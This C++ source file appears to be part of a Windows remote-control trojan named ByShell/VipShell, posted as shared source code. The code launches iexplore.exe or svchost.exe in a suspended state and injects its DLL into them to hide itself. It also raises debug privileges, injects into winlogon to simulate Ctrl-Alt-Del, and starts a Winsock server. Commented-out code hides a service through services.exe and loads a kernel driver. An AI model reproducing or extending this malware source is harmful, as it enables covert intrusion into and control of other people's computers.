main.cpp

软件源代码,共享。有2个文件

#include <windows.h>

#include <time.h>

//#include "usrlib.h"
//#pragma comment(lib,"usrlib")

#include "tchar.h"
#include "VipShellEx.h"
#include "..\DllModule.h"
#include "tools.h"

#pragma data_seg(".BYShell__Data")
WCHAR g_Path[MAX_PATH] = {0};
#pragma data_seg()
#pragma comment(linker, "/SECTION:.BYShell__Data,RWS")

#include "..\vipshellinfo\ByShellConfigStruct.h"

//const LPCWSTR INJECTPROCESSNAME = L"svchost.exe";
//const LPCWSTR WAITPROCESSNAME = L"winlogon.exe";  //等待线程
/*
const LPCWSTR INJECTPROCESSNAME = L"notepad.exe";
const LPCWSTR WAITPROCESSNAME = L"tlntsvr.exe";  //等待线程
*/

HFILE ExeLockHandle;
HFILE DllLockHandle;
OFSTRUCT ofstruct;

HINSTANCE g_hinstDLL;

//WCHAR VIPSHELL_EVENT_WAIT[100] = L"ByShell_Event_Wait";
//WCHAR VIPSHELL_EVENT_STATR_WAIT[100] = L"ByShell_Event_StartWait";
//WCHAR VIPSHELL_EVENT_STATR_STOP[100] =  L"ByShell_Event_StopWait";


class CDllModuleControl : public  CDllModuleControlInterface
{
public:
	virtual bool StartServerIEXPLORE();
	virtual bool StartServerSVCHOST();
};

CDllModuleControl g_hDllModule;


//void StopServer()
//{
//	HANDLE hStop = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_STATR_STOP);
//
//}
//
//bool  Start()
//{
//
//	//启动进程。。。
//
////	VIPSHELLCONFIG vipCfg;
////	GetVipShellConfig(&vipCfg);
//
//
//	return 0;
//}
//int WINAPI WinMain(          HINSTANCE hInstance,
//    HINSTANCE hPrevInstance,
//    LPSTR lpCmdLine,
//    int nCmdShow
//)
//{
//	return Start();
//}	


void GetExeFilePath(WCHAR* p)
{
	lstrcpy(p, g_Path);
}

bool CDllModuleControl::StartServerIEXPLORE()
{
	if(CreateThread(NULL,0,StartByShellIEXPLORE,0,0,0))
	{
	dbglog("创建工作线程成功，选择注入进程：iexplore.exe");
	}else
	{
	dbglog("创建工作线程失败，选择注入进程：iexplore.exe");
	}

	//CreateThread(NULL,0,HideMyService,0,0,0);

//	Start();
	return 0;
}

bool CDllModuleControl::StartServerSVCHOST()
{
	if(CreateThread(NULL,0,StartByShellSVCHOST,0,0,0))
	{
	dbglog("创建工作线程成功，选择注入进程：svchost.exe");
	}else
	{
	dbglog("创建工作线程失败，选择注入进程：svchost.exe");
	}

	//CreateThread(NULL,0,HideMyService,0,0,0);

//	Start();
	return 0;
}

//DWORD WINAPI HideMyService(LPVOID lpParameter)
//{
//    HANDLE hProcessH;
//
//	//CStartAggregate hStart;
//	//lstrcpy(g_Path, hStart.m_strExePath.c_str());
//	//VIPSHELLCONFIG confing;
//	//GetVipShellConfig(	&confing);
//
//	enableDebugPriv();
//	DWORD dwWaitIdH = GetProcessIdByName(L"services.exe");//ProceeName
//
//    hProcessH = OpenProcess( PROCESS_CREATE_THREAD| //允许远程创建线程
//	PROCESS_VM_OPERATION|  //允许远程VM操作
//	PROCESS_VM_WRITE,      //允许远程VM写
//	FALSE, 
//	dwWaitIdH);
//
//	if(dwWaitIdH != 0)
//	{
//		InjectHideMeRemote(hProcessH, /*&confing,*/"HideService");
//	}
//
//	return 0;
//}

DWORD WINAPI StartByShellIEXPLORE(LPVOID lpParameter)
{
	if(enableDebugPriv())
	{
	dbglog("提升进程权限成功");
	}else
	{
	dbglog("提升进程权限失败");
	}
//	KeyDownCtrlAltDel();
	COpenDesktop hDesktop;
	COpenDesktop hDesktop1;
	//线程插入。。
	//得到 桌面进程
//	std::vector<tagVipShellProcess> VecTor;
//	DWORD dwLen = GetProcessToVecTor(&VecTor);

//	MessageBox(NULL, L"sss", L"sss", 0);
	//CStartAggregate hStart;
	//lstrcpy(g_Path, hStart.m_strExePath.c_str());
	//VIPSHELLCONFIG confing;
	//GetVipShellConfig(	&confing);

	//wsprintf(VIPSHELL_EVENT_WAIT, L"Wait_%s", confing.szCfgFile);
	//wsprintf(VIPSHELL_EVENT_STATR_WAIT, L"Start_Wait_%s", confing.szCfgFile);
	//wsprintf(VIPSHELL_EVENT_STATR_STOP, L"StopWait_%s", confing.szCfgFile);




//	HANDLE hObject = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_WAIT);
//	if(GetLastError() == ERROR_ALREADY_EXISTS)
//	{
////		CloseHandle(hObject);
//	//	MessageBox(NULL, L"程序已经运行!", L"dsss", 0);
//	dbglog("失败！程序已经运行");
//		return FALSE;
//	}

//	CloseHandle(hObject);

//	lstrcpy(confing.szCfgFile, L"sss111");
//	lstrcpy(confing.szExplain, L"呵呵");
//	lstrcpy(confing.szUrl, L"Url");

//	MakeRun(hStart.m_strExePath.c_str(), NULL);
//	::StartServer(&confing);
//	return false;

////获取配置，如果不先获取配置信息，则将无法在之后使用 vipcfgEx.sz***Name;
//	VIPSHELLCONFIG vipcfgEx;
//	GetVipShellConfig( &vipcfgEx);
////结束获取
	GetMyConfig(FALSE);

//以CreateProcess启动IE
	WCHAR szIePath[MAX_PATH];

	GetSystemDirectory(szIePath,MAX_PATH);

	szIePath[2] = '\0';
	lstrcat(szIePath,L"\\Program Files\\Internet Explorer\\iexplore.exe");

	PROCESS_INFORMATION ProcessInfo;
	STARTUPINFO StartupInfo;
	ZeroMemory(&StartupInfo, sizeof(StartupInfo));
	StartupInfo.cb = sizeof StartupInfo;

	if(CreateProcess(NULL,szIePath,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&StartupInfo,&ProcessInfo))
	{
	dbglog("创建IE进程成功");
//启动IE

	//drvldr_stop("NTboot32");//尝试停止上次的驱动
	//drvldr_reg("NTboot32",3,"system32\\NTboot32.sys");//注册驱动
	//drvldr_load("NTboot32");//开启新的驱动


	//DWORD dwWaitId = 0;
	//while(dwWaitId == 0)
	//	dwWaitId = GetProcessIdByName(L"winlogon.exe");//WaitProceeName
	//
	//std::vector<tagVipShellProcess> VecTor;
	//DWORD dwLen = GetProcessToVecTor(&VecTor);

	//HWND hwndText = FindWindow(L"Notepad", NULL);
//	if( !hwndText )
//		return 0;

//	DWORD dwProcessId;
////	GetWindowThreadProcessId(hwndText, &dwProcessId);
//	dwProcessId = GetProcessIdByName(L"IEXPLORE.EXE");//InjectProceeName
	
	InjectHideMeRemote(ProcessInfo.hProcess,/*dwProcessId,*/ /*&confing,*/"StartServer");
	
	//if(dwWaitId != 0)
	//{
	//		VIPSHELLCONFIG run;
	//		
	//		lstrcpy(run.szUrl, hStart.m_strExePath.c_str());
	//		InjectHideMeRemote(ProcessInfo.hProcess,/*dwWaitId,*/ &run,"WaitServer");
	//}

	}//if CreateProcess
	else
	{
	dbglog("创建IE进程失败");
	}

	return 0;
}

DWORD WINAPI StartByShellSVCHOST(LPVOID lpParameter)
{
	if(enableDebugPriv())
	{
	dbglog("提升进程权限成功");
	}else
	{
	dbglog("提升进程权限失败");
	}

	COpenDesktop hDesktop;
	COpenDesktop hDesktop1;

	//CStartAggregate hStart;
	//lstrcpy(g_Path, hStart.m_strExePath.c_str());
	//VIPSHELLCONFIG confing;
	//GetVipShellConfig(	&confing);

	//wsprintf(VIPSHELL_EVENT_WAIT, L"Wait_%s", confing.szCfgFile);
	//wsprintf(VIPSHELL_EVENT_STATR_WAIT, L"Start_Wait_%s", confing.szCfgFile);
	//wsprintf(VIPSHELL_EVENT_STATR_STOP, L"StopWait_%s", confing.szCfgFile);


	//HANDLE hObject = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_WAIT);
	//if(GetLastError() == ERROR_ALREADY_EXISTS)
	//{

	//dbglog("失败！程序已经运行");
	//	return FALSE;
	//}

////获取配置，如果不先获取配置信息，则将无法在之后使用 vipcfgEx.sz***Name;
//	VIPSHELLCONFIG vipcfgEx;
//	GetVipShellConfig( &vipcfgEx);
////结束获取
	GetMyConfig(FALSE);

//以CreateProcess启动svchost
	WCHAR szSvchostPath[MAX_PATH];

	GetSystemDirectory(szSvchostPath,MAX_PATH);

	lstrcat(szSvchostPath,L"\\svchost.exe");

	PROCESS_INFORMATION ProcessInfo;
	STARTUPINFO StartupInfo;
	ZeroMemory(&StartupInfo, sizeof(StartupInfo));
	StartupInfo.cb = sizeof StartupInfo;

	if(CreateProcess(NULL,szSvchostPath,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&StartupInfo,&ProcessInfo))
	{
	dbglog("创建svchost进程成功");
//启动Svchost

	//drvldr_stop("NTboot32");//尝试停止上次的驱动
	//drvldr_reg("NTboot32",3,"system32\\NTboot32.sys");//注册驱动
	//drvldr_load("NTboot32");//开启新的驱动


	//DWORD dwWaitId = 0;
	//while(dwWaitId == 0)
	//	dwWaitId = GetProcessIdByName(L"winlogon.exe");//WaitProceeName
	//
	//std::vector<tagVipShellProcess> VecTor;
	//DWORD dwLen = GetProcessToVecTor(&VecTor);

	//HWND hwndText = FindWindow(L"Notepad", NULL);
	
	InjectHideMeRemote(ProcessInfo.hProcess,/*dwProcessId,*/ /*&confing,*/"StartServer");

	}//if CreateProcess
	else
	{
	dbglog("创建svchost进程失败");
	}

	return 0;
}

extern "C" __declspec(dllexport) bool DownCtrlAltDel()
{
	COpenDesktop hDesktop(L"Winlogon");
	COpenDesktop hDesktop1(L"Winlogon");
	PostMessage(HWND_BROADCAST, WM_HOTKEY, 0, MAKELONG(MOD_ALT | MOD_CONTROL, VK_DELETE));
	return true;
}
void KeyDownCtrlAltDel()
{
    HANDLE hProcess;

	enableDebugPriv();
	DWORD dwWaitId = GetProcessIdByName(L"Winlogon.exe");//ProceeName

    hProcess = OpenProcess( PROCESS_CREATE_THREAD| //允许远程创建线程
	PROCESS_VM_OPERATION|  //允许远程VM操作
	PROCESS_VM_WRITE,      //允许远程VM写
	FALSE, 
	dwWaitId);

	if(dwWaitId != 0)
	{
		//VIPSHELLCONFIG run;
		InjectHideMeRemote(hProcess, /*&run*/ "DownCtrlAltDel");
	}
}

//extern "C" __declspec(dllexport) bool WaitServer()
//{
//	COpenDesktop hDesktop;
//	COpenDesktop hDesktop1;
//	 
////	LPVIPSHELLCONFIG hServerConfig = (LPVIPSHELLCONFIG)lp;
////	
////	MakeRun(hServerConfig->szUrl, NULL);
////	return false;
////
////	HANDLE hObject = CreateMutex(NULL,FALSE, VIPSHELL_EVENT_STATR_WAIT);
////	if(GetLastError() == ERROR_ALREADY_EXISTS)
////	{
////	//	CloseHandle(hObject);
////		return 0;
////	}
////	MakeRun(hServerConfig->szUrl, NULL);
//////	
////	DWORD dwWait = 1000;
////	while(1)
////	{
////
////		HANDLE hStop = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_STATR_STOP);
////		if(GetLastError() == ERROR_ALREADY_EXISTS)
////		{		
//////			MessageBox(NULL, L"Exit", L"Exit", 0);
////			MakeRun(hServerConfig->szUrl, NULL, false);
////			CloseHandle(hStop);
////		}
////		CloseHandle(hStop);
////		Sleep(dwWait);
////		dwWait+=1000;
////		if(dwWait > 30 * 60 * 1000)
////			dwWait = 30 * 60 * 1000;
////		HANDLE hObject = CreateMutex(NULL,FALSE,VIPSHELL_EVENT_WAIT);
////		if(GetLastError() == ERROR_ALREADY_EXISTS)
////		{		
////		//	CloseHandle(hObject);
////			continue;
////	//		MessageBox(NULL, L"程序已经运行!", L"dsss", 0);
//////			return FALSE;
////		}
////
////		CloseHandle(hObject);
////
////		
////		PROCESS_INFORMATION ProcessInfo; 
////		STARTUPINFO StartupInfo; //This is an [in] parameter
////		ZeroMemory(&StartupInfo, sizeof(StartupInfo));
////		StartupInfo.cb = sizeof StartupInfo ; //Only compulsory field
////		if(CreateProcess(hServerConfig->szUrl, NULL, 
////			NULL,NULL,FALSE,0,NULL,
////			NULL,&StartupInfo,&ProcessInfo))
////		{ 
////			CloseHandle(ProcessInfo.hThread);
////			CloseHandle(ProcessInfo.hProcess);
////		}  
////
////		//RunFile(hServerConfig->szUrl);
//////ShellExecute(NULL, L"open", hServerConfig->szUrl, NULL, NULL, SW_SHOW);
////
////	}
//
//	return 0;
//}

extern "C" __declspec(dllexport) bool StartServer()
{
	
	if(enableDebugPriv())
	{
	dbglog("提升进程权限成功");
	}
	else
	{
	dbglog("提升进程权限失败");
	}

	COpenDesktop hDesktop;
	COpenDesktop hDesktop1;

	GetMyConfig(TRUE);

	//HANDLE hMutex = CreateMutex(NULL, FALSE, VIPSHELL_EVENT_WAIT);
	//LPVIPSHELLCONFIG hServerConfig = (LPVIPSHELLCONFIG)lp;

//	MessageBox(NULL, g_Path, g_Path, NULL);
	WORD wVersionRequested;
	WSADATA wsaData;
	int err;
//	MessageBox(NULL, hServerConfig->szExplain, hServerConfig->szCfgFile, 0);
	wVersionRequested = MAKEWORD( 2, 2 );
	 
	err = WSAStartup( wVersionRequested, &wsaData );
	if ( err != 0 ) {
		/* Tell the user t6hat we could not find a usable */
		/* WinSock DLL.                                  */
		return 0;
	}


	CVipShellEx hServer;


	HKEY hkey;
	DWORD type=REG_SZ;
	DWORD dwbuflen=MAX_PATH;
	TCHAR lpdata[MAX_PATH];

	WCHAR KeyExplain[512]={0};
	lstrcpy(KeyExplain,L"SYSTEM\\CurrentControlSet\\Services\\");
	lstrcat(KeyExplain,Conf_ServiceName);

	RegOpenKeyEx(HKEY_LOCAL_MACHINE,KeyExplain,0,KEY_QUERY_VALUE,&hkey);

	if( !RegQueryValueEx(hkey,L"Explain",NULL,NULL,(LPBYTE)lpdata,&dwbuflen) )
	{
	hServer.SetExplain(lpdata);
	}else
	{
	hServer.SetExplain(Conf_Explain);
	}

	RegCloseKey(hkey);


	//下载配置文件。。
//	hServer.ConnectServer(_T("127.0.0.1"), 96);
//	hServer.ConnectServer(L"http://127.0.0.1/ip.txt");